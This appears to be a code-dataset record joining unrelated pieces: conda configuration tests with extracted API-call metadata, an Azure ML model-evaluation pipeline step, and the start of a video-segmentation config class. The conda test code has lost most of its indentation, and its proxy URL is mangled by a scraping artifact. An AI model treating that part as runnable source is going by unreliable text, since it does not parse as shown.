config.get_default_urls = _get_default_urls
# unset CIO_TEST. This is a Continuum-internal variable that draws packages from an internal server instead of
# repo.continuum.io
try:
del os.environ['CIO_TEST']
except KeyError:
pass
class TestConfig(unittest.TestCase):
# These tests are mostly to ensure API stability
def __init__(self, *args, **kwargs):
config.rc = config.load_condarc(config.rc_path)
# Otherwise normalization tests will fail if the user is logged into
# binstar.
config.rc['add_binstar_token'] = False
super(TestConfig, self).__init__(*args, **kwargs)
def test_globals(self):
self.assertTrue(config.root_dir)
self.assertTrue(config.pkgs_dirs)
self.assertTrue(config.envs_dirs)
self.assertTrue(config.default_prefix)
self.assertTrue(config.platform)
self.assertTrue(config.subdir)
self.assertTrue(config.arch_name)
self.assertTrue(config.bits in (32, 64))
def test_pkgs_dir_from_envs_dir(self):
root_dir = config.root_dir
root_pkgs = join(root_dir, 'pkgs')
for pi, po in [
(join(root_dir, 'envs'), root_pkgs),
                ('/usr/local/foo/envs' if config.platform != 'win' else r'C:\envs',
                 '/usr/local/foo/envs/.pkgs' if config.platform != 'win' else r'C:\envs\.pkgs'),
]:
self.assertEqual(config.pkgs_dir_from_envs_dir(pi), po)
def test_proxy_settings(self):
self.assertEqual(config.get_proxy_servers(),
{'http': 'http://user:[email protected]:8080',
'https': 'https://user:[email protected]:8080'})
def test_normalize_urls(self):
current_platform = config.subdir
assert config.DEFAULT_CHANNEL_ALIAS == 'https://conda.anaconda.org/'
assert config.rc.get('channel_alias') == 'https://your.repo/'
for channel in iterkeys(config.normalize_urls(['defaults', 'system',
'https://anaconda.org/username', 'file:///Users/username/repo',
'username'])):
assert (channel.endswith('/%s/' % current_platform) or
channel.endswith('/noarch/'))
self.assertEqual(config.normalize_urls([
'defaults', 'system', 'https://conda.anaconda.org/username',
'file:///Users/username/repo', 'username'
], 'osx-64'),
{'file:///Users/username/repo/noarch/': ('file:///Users/username/repo', 6),
'file:///Users/username/repo/osx-64/': ('file:///Users/username/repo', 6),
'http://repo.continuum.io/pkgs/free/noarch/': (None, 1),
'http://repo.continuum.io/pkgs/free/osx-64/': (None, 1),
'http://repo.continuum.io/pkgs/pro/noarch/': (None, 1),
'http://repo.continuum.io/pkgs/pro/osx-64/': (None, 1),
'http://some.custom/channel/noarch/': ('http://some.custom/channel', 3),
'http://some.custom/channel/osx-64/': ('http://some.custom/channel', 3),
'https://conda.anaconda.org/username/noarch/': ('https://conda.anaconda.org/username', 5),
'https://conda.anaconda.org/username/osx-64/': ('https://conda.anaconda.org/username', 5),
'https://your.repo/binstar_username/noarch/': ('binstar_username', 2),
'https://your.repo/binstar_username/osx-64/': ('binstar_username', 2),
'https://your.repo/username/noarch/': ('username', 7),
'https://your.repo/username/osx-64/': ('username', 7)})
test_condarc = os.path.join(os.path.dirname(__file__), 'test_condarc')
def _read_test_condarc():
with open(test_condarc) as f:
return f.read()
# Tests for the conda config command
# FIXME This should be multiple individual tests
@pytest.mark.slow
def test_config_command_basics():
try:
# Test that creating the file adds the defaults channel
        assert not os.path.exists(test_condarc)
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'test')
assert stdout == stderr == ''
assert _read_test_condarc() == """\
channels:
- test
- defaults
"""
os.unlink(test_condarc)
# When defaults is explicitly given, it should not be added
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'test', '--add', 'channels', 'defaults')
assert stdout == stderr == ''
assert _read_test_condarc() == """\
channels:
- defaults
- test
"""
os.unlink(test_condarc)
# Duplicate keys should not be added twice
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'test')
assert stdout == stderr == ''
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'test')
assert stdout == ''
assert stderr == "Skipping channels: test, item already exists"
assert _read_test_condarc() == """\
channels:
- test
- defaults
"""
os.unlink(test_condarc)
# Test creating a new file with --set
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--set', 'always_yes', 'true')
assert stdout == stderr == ''
assert _read_test_condarc() == """\
always_yes: true
"""
os.unlink(test_condarc)
finally:
try:
os.unlink(test_condarc)
except OSError:
pass
# FIXME Break into multiple tests
@pytest.mark.slow
def test_config_command_get():
try:
# Test --get
with open(test_condarc, 'w') as f:
f.write("""\
channels:
- test
- defaults
create_default_packages:
- ipython
- numpy
changeps1: no
always_yes: true
invalid_key: yes
channel_alias: http://alpha.conda.anaconda.org
""")
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get')
assert stdout == """\
--set always_yes True
--set changeps1 no
--set channel_alias http://alpha.conda.anaconda.org
--add channels 'defaults'
--add channels 'test'
--add create_default_packages 'numpy'
--add create_default_packages 'ipython'\
"""
assert stderr == "unknown key invalid_key"
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'channels')
assert stdout == """\
--add channels 'defaults'
--add channels 'test'\
"""
assert stderr == ""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'changeps1')
assert stdout == """\
--set changeps1 no\
"""
assert stderr == ""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'changeps1', 'channels')
assert stdout == """\
--set changeps1 no
--add channels 'defaults'
--add channels 'test'\
"""
assert stderr == ""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'allow_softlinks')
assert stdout == ""
assert stderr == ""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'track_features')
assert stdout == ""
assert stderr == ""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'invalid_key')
assert stdout == ""
assert "invalid choice: 'invalid_key'" in stderr
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--get', 'not_valid_key')
assert stdout == ""
assert "invalid choice: 'not_valid_key'" in stderr
os.unlink(test_condarc)
finally:
try:
os.unlink(test_condarc)
except OSError:
pass
# FIXME Break into multiple tests
@pytest.mark.slow
def test_config_command_parser():
try:
# Now test the YAML "parser"
# Channels is normal content.
# create_default_packages has extra spaces in list items
condarc = """\
channels:
- test
- defaults
create_default_packages :
- ipython
- numpy
changeps1: false
# Here is a comment
always_yes: yes
"""
# First verify that this itself is valid YAML
assert yaml.load(condarc, Loader=yaml.RoundTripLoader) == {'channels': ['test', 'defaults'],
'create_default_packages': ['ipython', 'numpy'], 'changeps1':
False, 'always_yes': 'yes'}
with open(test_condarc, 'w') as f:
f.write(condarc)
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--get')
assert stdout == """\
--set always_yes yes
--set changeps1 False
--add channels 'defaults'
--add channels 'test'
--add create_default_packages 'numpy'
--add create_default_packages 'ipython'\
"""
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'mychannel')
assert stdout == stderr == ''
assert _read_test_condarc() == """\
channels:
- mychannel
- test
- defaults
create_default_packages:
- ipython
- numpy
changeps1: false
# Here is a comment
always_yes: 'yes'
"""
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--set', 'changeps1', 'true')
assert stdout == stderr == ''
assert _read_test_condarc() == """\
channels:
- mychannel
- test
- defaults
create_default_packages:
- ipython
- numpy
changeps1: true
# Here is a comment
always_yes: 'yes'
"""
os.unlink(test_condarc)
# Test adding a new list key. We couldn't test this above because it
# doesn't work yet with odd whitespace
condarc = """\
channels:
- test
- defaults
always_yes: true
"""
with open(test_condarc, 'w') as f:
f.write(condarc)
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'disallow', 'perl')
assert stdout == stderr == ''
assert _read_test_condarc() == condarc + """\
disallow:
- perl
"""
os.unlink(test_condarc)
finally:
try:
os.unlink(test_condarc)
except OSError:
pass
# FIXME Break into multiple tests
@pytest.mark.slow
def test_config_command_remove_force():
try:
# Finally, test --remove, --remove-key
run_conda_command('config', '--file', test_condarc, '--add',
'channels', 'test')
run_conda_command('config', '--file', test_condarc, '--set',
'always_yes', 'true')
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--remove', 'channels', 'test')
assert stdout == stderr == ''
assert yaml.load(_read_test_condarc(), Loader=yaml.RoundTripLoader) == {'channels': ['defaults'],
'always_yes': True}
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--remove', 'channels', 'test', '--force')
assert stdout == ''
assert stderr == "Error: 'test' is not in the 'channels' key of the config file"
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--remove', 'disallow', 'python', '--force')
assert stdout == ''
assert stderr == "Error: key 'disallow' is not in the config file"
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--remove-key', 'always_yes', '--force')
assert stdout == stderr == ''
assert yaml.load(_read_test_condarc(), Loader=yaml.RoundTripLoader) == {'channels': ['defaults']}
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--remove-key', 'always_yes', '--force')
assert stdout == ''
assert stderr == "Error: key 'always_yes' is not in the config file"
os.unlink(test_condarc)
finally:
try:
os.unlink(test_condarc)
except OSError:
pass
# FIXME Break into multiple tests
@pytest.mark.slow
def test_config_command_bad_args():
try:
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--add',
'notarealkey', 'test')
assert stdout == ''
assert not exists(test_condarc)
stdout, stderr = run_conda_command('config', '--file', test_condarc, '--set',
'notarealkey', 'yes')
assert stdout == ''
assert not exists(test_condarc)
finally:
try:
os.unlink(test_condarc)
except OSError:
pass
def test_invalid_rc():
# Some tests for unexpected input in the condarc, like keys that are the
# wrong type
try:
condarc = """\
channels:
"""
with open(test_condarc, 'w') as f:
f.write(condarc)
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--add', 'channels', 'test')
assert stdout == ''
assert stderr == """\
Error: Could not parse the yaml file. Use -f to use the
yaml parser (this will remove any structure or comments from the existing
.condarc file). Reason: key 'channels' should be a list, not NoneType."""
assert _read_test_condarc() == condarc
os.unlink(test_condarc)
finally:
try:
pass
os.unlink(test_condarc)
except OSError:
pass
def test_config_set():
# Test the config set command
# Make sure it accepts only boolean values for boolean keys and any value for string keys
try:
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--set', 'always_yes', 'yep')
assert stdout == ''
assert stderr == 'Error: Key: always_yes; yep is not a YAML boolean.'
finally:
try:
os.unlink(test_condarc)
except OSError:
pass
def test_set_rc_string():
# Test setting string keys in .condarc
# We specifically test ssl_verify since it can be either a boolean or a string
try:
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--set', 'ssl_verify', 'yes')
assert stdout == ''
assert stderr == ''
verify = yaml.load(open(test_condarc, 'r'), Loader=yaml.RoundTripLoader)['ssl_verify']
assert verify == 'yes'
stdout, stderr = run_conda_command('config', '--file', test_condarc,
'--set', 'ssl_verify', 'test_string.crt')
assert stdout == ''
assert stderr == ''
verify = yaml.load(open(test_condarc, 'r'), Loader=yaml.RoundTripLoader)['ssl_verify']
assert verify == 'test_string.crt'
os.unlink(test_condarc)
finally:
try:
os.unlink(test_condarc)
except OSError:
pass
| [
"os.path.exists",
"conda.config.rc.get",
"conda.config.pkgs_dir_from_envs_dir",
"os.path.join",
"conda.config.load_condarc",
"os.path.dirname",
"conda.utils.get_yaml",
"os.unlink",
"conda.config.get_proxy_servers",
"tests.helpers.run_conda_command",
"conda.config.normalize_urls"
]
| [((460, 470), 'conda.utils.get_yaml', 'get_yaml', ([], {}), '()\n', (468, 470), False, 'from conda.utils import get_yaml\n'), ((552, 569), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (559, 569), False, 'from os.path import dirname, join, exists\n'), ((4287, 4312), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (4302, 4312), False, 'import os\n'), ((1105, 1140), 'conda.config.load_condarc', 'config.load_condarc', (['config.rc_path'], {}), '(config.rc_path)\n', (1124, 1140), True, 'import conda.config as config\n'), ((1813, 1835), 'os.path.join', 'join', (['root_dir', '"""pkgs"""'], {}), "(root_dir, 'pkgs')\n", (1817, 1835), False, 'from os.path import dirname, join, exists\n'), ((4703, 4788), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )\n", (4720, 4788), False, 'from tests.helpers import run_conda_command\n'), ((4922, 4945), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (4931, 4945), False, 'import os\n'), ((5040, 5157), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""', '"""--add"""', '"""channels"""', '"""defaults"""'], {}), "('config', '--file', test_condarc, '--add', 'channels',\n 'test', '--add', 'channels', 'defaults')\n", (5057, 5157), False, 'from tests.helpers import run_conda_command\n'), ((5284, 5307), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (5293, 5307), False, 'import os\n'), ((5385, 5470), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )\n", (5402, 5470), False, 'from tests.helpers import run_conda_command\n'), ((5537, 5622), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )\n", (5554, 5622), False, 'from tests.helpers import run_conda_command\n'), ((5814, 5837), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (5823, 5837), False, 'import os\n'), ((5910, 5996), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""always_yes"""', '"""true"""'], {}), "('config', '--file', test_condarc, '--set', 'always_yes',\n 'true')\n", (5927, 5996), False, 'from tests.helpers import run_conda_command\n'), ((6112, 6135), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (6121, 6135), False, 'import os\n'), ((6650, 6710), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""'], {}), "('config', '--file', test_condarc, '--get')\n", (6667, 6710), False, 'from tests.helpers import run_conda_command\n'), ((7042, 7114), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""channels"""'], {}), "('config', '--file', test_condarc, '--get', 'channels')\n", (7059, 7114), False, 'from tests.helpers import run_conda_command\n'), ((7261, 7334), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 
'test_condarc', '"""--get"""', '"""changeps1"""'], {}), "('config', '--file', test_condarc, '--get', 'changeps1')\n", (7278, 7334), False, 'from tests.helpers import run_conda_command\n'), ((7452, 7541), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""changeps1"""', '"""channels"""'], {}), "('config', '--file', test_condarc, '--get', 'changeps1',\n 'channels')\n", (7469, 7541), False, 'from tests.helpers import run_conda_command\n'), ((7707, 7786), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""allow_softlinks"""'], {}), "('config', '--file', test_condarc, '--get', 'allow_softlinks')\n", (7724, 7786), False, 'from tests.helpers import run_conda_command\n'), ((7878, 7956), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""track_features"""'], {}), "('config', '--file', test_condarc, '--get', 'track_features')\n", (7895, 7956), False, 'from tests.helpers import run_conda_command\n'), ((8048, 8123), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""invalid_key"""'], {}), "('config', '--file', test_condarc, '--get', 'invalid_key')\n", (8065, 8123), False, 'from tests.helpers import run_conda_command\n'), ((8244, 8321), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""', '"""not_valid_key"""'], {}), "('config', '--file', test_condarc, '--get', 'not_valid_key')\n", (8261, 8321), False, 'from tests.helpers import run_conda_command\n'), ((8427, 8450), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (8436, 8450), False, 'import os\n'), ((9343, 9403), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--get"""'], {}), "('config', '--file', test_condarc, '--get')\n", (9360, 9403), False, 'from tests.helpers import run_conda_command\n'), ((9635, 9724), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""mychannel"""'], {}), "('config', '--file', test_condarc, '--add', 'channels',\n 'mychannel')\n", (9652, 9724), False, 'from tests.helpers import run_conda_command\n'), ((9997, 10082), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""changeps1"""', '"""true"""'], {}), "('config', '--file', test_condarc, '--set', 'changeps1',\n 'true')\n", (10014, 10082), False, 'from tests.helpers import run_conda_command\n'), ((10338, 10361), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (10347, 10361), False, 'import os\n'), ((10663, 10748), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""disallow"""', '"""perl"""'], {}), "('config', '--file', test_condarc, '--add', 'disallow', 'perl'\n )\n", (10680, 10748), False, 'from tests.helpers import run_conda_command\n'), ((10879, 10902), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (10888, 10902), False, 'import os\n'), ((11183, 11268), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 
'channels', 'test'\n )\n", (11200, 11268), False, 'from tests.helpers import run_conda_command\n'), ((11284, 11370), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""always_yes"""', '"""true"""'], {}), "('config', '--file', test_condarc, '--set', 'always_yes',\n 'true')\n", (11301, 11370), False, 'from tests.helpers import run_conda_command\n'), ((11404, 11491), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--remove"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--remove', 'channels',\n 'test')\n", (11421, 11491), False, 'from tests.helpers import run_conda_command\n'), ((11702, 11800), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--remove"""', '"""channels"""', '"""test"""', '"""--force"""'], {}), "('config', '--file', test_condarc, '--remove', 'channels',\n 'test', '--force')\n", (11719, 11800), False, 'from tests.helpers import run_conda_command\n'), ((11952, 12052), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--remove"""', '"""disallow"""', '"""python"""', '"""--force"""'], {}), "('config', '--file', test_condarc, '--remove', 'disallow',\n 'python', '--force')\n", (11969, 12052), False, 'from tests.helpers import run_conda_command\n'), ((12190, 12286), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--remove-key"""', '"""always_yes"""', '"""--force"""'], {}), "('config', '--file', test_condarc, '--remove-key',\n 'always_yes', '--force')\n", (12207, 12286), False, 'from tests.helpers import run_conda_command\n'), ((12465, 12561), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--remove-key"""', '"""always_yes"""', '"""--force"""'], {}), "('config', '--file', test_condarc, '--remove-key',\n 'always_yes', '--force')\n", (12482, 12561), False, 'from tests.helpers import run_conda_command\n'), ((12684, 12707), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (12693, 12707), False, 'import os\n'), ((12953, 13040), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""notarealkey"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 'notarealkey',\n 'test')\n", (12970, 13040), False, 'from tests.helpers import run_conda_command\n'), ((13144, 13230), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""notarealkey"""', '"""yes"""'], {}), "('config', '--file', test_condarc, '--set', 'notarealkey',\n 'yes')\n", (13161, 13230), False, 'from tests.helpers import run_conda_command\n'), ((13692, 13777), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--add"""', '"""channels"""', '"""test"""'], {}), "('config', '--file', test_condarc, '--add', 'channels', 'test'\n )\n", (13709, 13777), False, 'from tests.helpers import run_conda_command\n'), ((14134, 14157), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (14143, 14157), False, 'import os\n'), ((14465, 14550), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""always_yes"""', '"""yep"""'], {}), 
"('config', '--file', test_condarc, '--set', 'always_yes',\n 'yep')\n", (14482, 14550), False, 'from tests.helpers import run_conda_command\n'), ((14989, 15074), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""ssl_verify"""', '"""yes"""'], {}), "('config', '--file', test_condarc, '--set', 'ssl_verify',\n 'yes')\n", (15006, 15074), False, 'from tests.helpers import run_conda_command\n'), ((15323, 15420), 'tests.helpers.run_conda_command', 'run_conda_command', (['"""config"""', '"""--file"""', 'test_condarc', '"""--set"""', '"""ssl_verify"""', '"""test_string.crt"""'], {}), "('config', '--file', test_condarc, '--set', 'ssl_verify',\n 'test_string.crt')\n", (15340, 15420), False, 'from tests.helpers import run_conda_command\n'), ((15665, 15688), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (15674, 15688), False, 'import os\n'), ((2227, 2253), 'conda.config.get_proxy_servers', 'config.get_proxy_servers', ([], {}), '()\n', (2251, 2253), True, 'import conda.config as config\n'), ((2563, 2593), 'conda.config.rc.get', 'config.rc.get', (['"""channel_alias"""'], {}), "('channel_alias')\n", (2576, 2593), True, 'import conda.config as config\n'), ((2651, 2781), 'conda.config.normalize_urls', 'config.normalize_urls', (["['defaults', 'system', 'https://anaconda.org/username',\n 'file:///Users/username/repo', 'username']"], {}), "(['defaults', 'system',\n 'https://anaconda.org/username', 'file:///Users/username/repo', 'username']\n )\n", (2672, 2781), True, 'import conda.config as config\n'), ((2941, 3086), 'conda.config.normalize_urls', 'config.normalize_urls', (["['defaults', 'system', 'https://conda.anaconda.org/username',\n 'file:///Users/username/repo', 'username']", '"""osx-64"""'], {}), "(['defaults', 'system',\n 'https://conda.anaconda.org/username', 'file:///Users/username/repo',\n 'username'], 'osx-64')\n", (2962, 3086), True, 'import conda.config as config\n'), ((4647, 4677), 'os.path.exists', 'os.path.exists', (['"""test_condarc"""'], {}), "('test_condarc')\n", (4661, 4677), False, 'import os\n'), ((6192, 6215), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (6201, 6215), False, 'import os\n'), ((8508, 8531), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (8517, 8531), False, 'import os\n'), ((10960, 10983), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (10969, 10983), False, 'import os\n'), ((12764, 12787), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (12773, 12787), False, 'import os\n'), ((13097, 13117), 'os.path.exists', 'exists', (['test_condarc'], {}), '(test_condarc)\n', (13103, 13117), False, 'from os.path import dirname, join, exists\n'), ((13287, 13307), 'os.path.exists', 'exists', (['test_condarc'], {}), '(test_condarc)\n', (13293, 13307), False, 'from os.path import dirname, join, exists\n'), ((13364, 13387), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (13373, 13387), False, 'import os\n'), ((14213, 14236), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (14222, 14236), False, 'import os\n'), ((14736, 14759), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (14745, 14759), False, 'import os\n'), ((15727, 15750), 'os.unlink', 'os.unlink', (['test_condarc'], {}), '(test_condarc)\n', (15736, 15750), False, 'import os\n'), ((1873, 1895), 'os.path.join', 'join', (['root_dir', '"""envs"""'], {}), "(root_dir, 'envs')\n", 
(1877, 1895), False, 'from os.path import dirname, join, exists\n'), ((2127, 2160), 'conda.config.pkgs_dir_from_envs_dir', 'config.pkgs_dir_from_envs_dir', (['pi'], {}), '(pi)\n', (2156, 2160), True, 'import conda.config as config\n')] |
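The tests in the record above drive `conda config` through `tests.helpers.run_conda_command`. As a hedged illustration only (the real helper in the conda test suite may differ), such a wrapper can be sketched as a thin subprocess call, assuming a `conda` executable on PATH:

import subprocess

def run_conda_command_sketch(*args):
    """Run `conda <args>` and return (stdout, stderr) as text."""
    proc = subprocess.Popen(('conda',) + args,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=True)
    return proc.communicate()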
import os
from azureml.pipeline.steps import PythonScriptStep
from azureml.core.runconfig import RunConfiguration
from azureml.core.conda_dependencies import CondaDependencies
from azureml.pipeline.core import PipelineData
from azureml.pipeline.core import PipelineParameter
from azureml.pipeline.steps import EstimatorStep
from azureml.train.dnn import PyTorch
def evaluate_step(model_dir, test_dir, compute_target):
'''
This step evaluates the trained model on the testing data and outputs the accuracy.
:param model_dir: The reference to the directory containing the trained model
:type model_dir: DataReference
:param test_dir: The reference to the directory containing the testing data
:type test_dir: DataReference
:param compute_target: The compute target to run the step on
:type compute_target: ComputeTarget
    :return: The evaluate step, step outputs dictionary (keys: accuracy_file)
:rtype: EstimatorStep, dict
'''
accuracy_file = PipelineData(
name='accuracy_file',
pipeline_output_name='accuracy_file',
datastore=test_dir.datastore,
output_mode='mount',
is_directory=False)
outputs = [accuracy_file]
outputs_map = { 'accuracy_file': accuracy_file }
estimator = PyTorch(
source_directory=os.path.dirname(os.path.abspath(__file__)),
entry_script='evaluate.py',
framework_version='1.3',
compute_target=compute_target,
use_gpu=True)
step = EstimatorStep(
name="Evaluate Model",
estimator=estimator,
estimator_entry_script_arguments=[
'--test_dir', test_dir,
'--model_dir', model_dir,
'--accuracy_file', accuracy_file
],
inputs=[model_dir, test_dir],
outputs=outputs,
compute_target=compute_target,
allow_reuse=True)
return step, outputs_map
| [
"os.path.abspath",
"azureml.pipeline.core.PipelineData",
"azureml.pipeline.steps.EstimatorStep"
]
| [((998, 1145), 'azureml.pipeline.core.PipelineData', 'PipelineData', ([], {'name': '"""accuracy_file"""', 'pipeline_output_name': '"""accuracy_file"""', 'datastore': 'test_dir.datastore', 'output_mode': '"""mount"""', 'is_directory': '(False)'}), "(name='accuracy_file', pipeline_output_name='accuracy_file',\n datastore=test_dir.datastore, output_mode='mount', is_directory=False)\n", (1010, 1145), False, 'from azureml.pipeline.core import PipelineData\n'), ((1509, 1798), 'azureml.pipeline.steps.EstimatorStep', 'EstimatorStep', ([], {'name': '"""Evaluate Model"""', 'estimator': 'estimator', 'estimator_entry_script_arguments': "['--test_dir', test_dir, '--model_dir', model_dir, '--accuracy_file',\n accuracy_file]", 'inputs': '[model_dir, test_dir]', 'outputs': 'outputs', 'compute_target': 'compute_target', 'allow_reuse': '(True)'}), "(name='Evaluate Model', estimator=estimator,\n estimator_entry_script_arguments=['--test_dir', test_dir, '--model_dir',\n model_dir, '--accuracy_file', accuracy_file], inputs=[model_dir,\n test_dir], outputs=outputs, compute_target=compute_target, allow_reuse=True\n )\n", (1522, 1798), False, 'from azureml.pipeline.steps import EstimatorStep\n'), ((1339, 1364), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (1354, 1364), False, 'import os\n')] |
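A hedged usage sketch for the `evaluate_step` factory above, assuming the Azure ML SDK v1; the workspace configuration, compute target name, datastore name and datastore paths are placeholders, not part of the original record:

from azureml.core import Workspace, Datastore
from azureml.core.compute import ComputeTarget
from azureml.data.data_reference import DataReference
from azureml.pipeline.core import Pipeline

ws = Workspace.from_config()  # loads the workspace from a local config.json
compute_target = ComputeTarget(workspace=ws, name='gpu-cluster')  # existing cluster (placeholder name)
datastore = Datastore.get(ws, 'workspaceblobstore')

model_dir = DataReference(datastore=datastore, data_reference_name='model_dir',
                          path_on_datastore='models')
test_dir = DataReference(datastore=datastore, data_reference_name='test_dir',
                         path_on_datastore='test')

step, outputs = evaluate_step(model_dir, test_dir, compute_target)
pipeline = Pipeline(workspace=ws, steps=[step])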
import torch
import argparse
import os
import sys
import cv2
import time
class Configuration():
def __init__(self):
self.EXP_NAME = 'mobilenetv2_cfbi'
self.DIR_ROOT = './'
self.DIR_DATA = os.path.join(self.DIR_ROOT, 'datasets')
self.DIR_DAVIS = os.path.join(self.DIR_DATA, 'DAVIS')
self.DIR_YTB = os.path.join(self.DIR_DATA, 'YTB/train')
self.DIR_YTB_EVAL = os.path.join(self.DIR_DATA, 'YTB/valid')
self.DIR_RESULT = os.path.join(self.DIR_ROOT, 'result', self.EXP_NAME)
self.DIR_CKPT = os.path.join(self.DIR_RESULT, 'ckpt')
self.DIR_LOG = os.path.join(self.DIR_RESULT, 'log')
self.DIR_IMG_LOG = os.path.join(self.DIR_RESULT, 'log', 'img')
self.DIR_TB_LOG = os.path.join(self.DIR_RESULT, 'log', 'tensorboard')
self.DIR_EVALUATION = os.path.join(self.DIR_RESULT, 'eval')
self.DATASETS = ['youtubevos']
